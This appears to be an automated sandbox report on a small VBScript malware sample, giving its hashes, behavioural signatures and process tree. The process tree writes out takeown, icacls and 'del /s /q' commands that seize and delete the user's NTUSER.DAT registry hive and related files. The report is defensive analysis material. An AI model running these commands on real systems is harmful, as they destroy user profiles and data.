Analysis
-
max time kernel
141s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
01/09/2024, 13:14
Static task
static1
Behavioral task
behavioral1
Sample
file.vbs
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
file.vbs
Resource
win10v2004-20240802-en
General
-
Target
file.vbs
-
Size
506B
-
MD5
0c7e1be66d051894037fbd4d3ba7e873
-
SHA1
f42da981a96a415fcfe54b03369c024579ca91e6
-
SHA256
8376d1d8d0eacb7462cdf9c4548e5e700999ec3112355dcb48041a1b636179e6
-
SHA512
92e15380deffd98351b16962b23b41492c528f02f9993198c4010c3ed1d50a6c7cbab38aa621c2f04eaf96a7431d01eb8ef1299f59ccfae15aac4dfa72c1ce74
Malware Config
Signatures
-
Possible privilege escalation attempt 14 IoCs
pid Process 1436 takeown.exe 2284 icacls.exe 4092 takeown.exe 3544 takeown.exe 1864 takeown.exe 3940 icacls.exe 416 icacls.exe 5068 icacls.exe 900 icacls.exe 4144 icacls.exe 3940 takeown.exe 2916 icacls.exe 5036 takeown.exe 2780 takeown.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation WScript.exe -
Modifies file permissions 1 TTPs 14 IoCs
pid Process 4144 icacls.exe 3940 takeown.exe 416 icacls.exe 1436 takeown.exe 5036 takeown.exe 900 icacls.exe 1864 takeown.exe 3940 icacls.exe 2780 takeown.exe 2916 icacls.exe 2284 icacls.exe 4092 takeown.exe 5068 icacls.exe 3544 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 42 IoCs
description pid Process procid_target PID 4496 wrote to memory of 3940 4496 WScript.exe 84 PID 4496 wrote to memory of 3940 4496 WScript.exe 84 PID 4496 wrote to memory of 416 4496 WScript.exe 86 PID 4496 wrote to memory of 416 4496 WScript.exe 86 PID 4496 wrote to memory of 2936 4496 WScript.exe 88 PID 4496 wrote to memory of 2936 4496 WScript.exe 88 PID 4496 wrote to memory of 2780 4496 WScript.exe 91 PID 4496 wrote to memory of 2780 4496 WScript.exe 91 PID 4496 wrote to memory of 2916 4496 WScript.exe 93 PID 4496 wrote to memory of 2916 4496 WScript.exe 93 PID 4496 wrote to memory of 1348 4496 WScript.exe 95 PID 4496 wrote to memory of 1348 4496 WScript.exe 95 PID 4496 wrote to memory of 1436 4496 WScript.exe 98 PID 4496 wrote to memory of 1436 4496 WScript.exe 98 PID 4496 wrote to memory of 2284 4496 WScript.exe 100 PID 4496 wrote to memory of 2284 4496 WScript.exe 100 PID 4496 wrote to memory of 1596 4496 WScript.exe 102 PID 4496 wrote to memory of 1596 4496 WScript.exe 102 PID 4496 wrote to memory of 5036 4496 WScript.exe 104 PID 4496 wrote to memory of 5036 4496 WScript.exe 104 PID 4496 wrote to memory of 5068 4496 WScript.exe 106 PID 4496 wrote to memory of 5068 4496 WScript.exe 106 PID 4496 wrote to memory of 4388 4496 WScript.exe 110 PID 4496 wrote to memory of 4388 4496 WScript.exe 110 PID 4496 wrote to memory of 4092 4496 WScript.exe 112 PID 4496 wrote to memory of 4092 4496 WScript.exe 112 PID 4496 wrote to memory of 900 4496 WScript.exe 114 PID 4496 wrote to memory of 900 4496 WScript.exe 114 PID 4496 wrote to memory of 4032 4496 WScript.exe 116 PID 4496 wrote to memory of 4032 4496 WScript.exe 116 PID 4496 wrote to memory of 3544 4496 WScript.exe 119 PID 4496 wrote to memory of 3544 4496 WScript.exe 119 PID 4496 wrote to memory of 4144 4496 WScript.exe 121 PID 4496 wrote to memory of 4144 4496 WScript.exe 121 PID 4496 wrote to memory of 3240 4496 WScript.exe 124 PID 4496 wrote to memory of 3240 4496 WScript.exe 124 PID 4496 wrote to memory of 1864 4496 WScript.exe 127 PID 4496 wrote to memory of 1864 4496 WScript.exe 127 PID 4496 wrote to memory of 3940 4496 WScript.exe 129 PID 4496 wrote to memory of 3940 4496 WScript.exe 129 PID 4496 wrote to memory of 416 4496 WScript.exe 131 PID 4496 wrote to memory of 416 4496 WScript.exe 131
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4496 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /f C:\Users\Admin\NTUSER.DAT2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3940
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" C:\Users\Admin\NTUSER.DAT /grant Everyone:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:416
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c del/s/q C:\Users\Admin\NTUSER.DAT2⤵PID:2936
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /f C:\Users\Admin\ntuser.dat.LOG12⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2780
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" C:\Users\Admin\ntuser.dat.LOG1 /grant Everyone:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2916
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c del/s/q C:\Users\Admin\ntuser.dat.LOG12⤵PID:1348
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /f C:\Users\Admin\ntuser.dat.LOG22⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1436
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" C:\Users\Admin\ntuser.dat.LOG2 /grant Everyone:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2284
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c del/s/q C:\Users\Admin\ntuser.dat.LOG22⤵PID:1596
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /f C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TM.blf2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5036
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TM.blf /grant Everyone:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5068
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c del/s/q C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TM.blf2⤵PID:4388
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /f C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4092
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms /grant Everyone:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:900
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c del/s/q C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms2⤵PID:4032
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /f C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000002.regtrans-ms2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3544
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000002.regtrans-ms /grant Everyone:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4144
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c del/s/q C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000002.regtrans-ms2⤵PID:3240
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /f C:\Users\Admin\ntuser.ini2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1864
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" C:\Users\Admin\ntuser.ini /grant Everyone:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3940
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c del/s/q C:\Users\Admin\ntuser.ini2⤵PID:416
-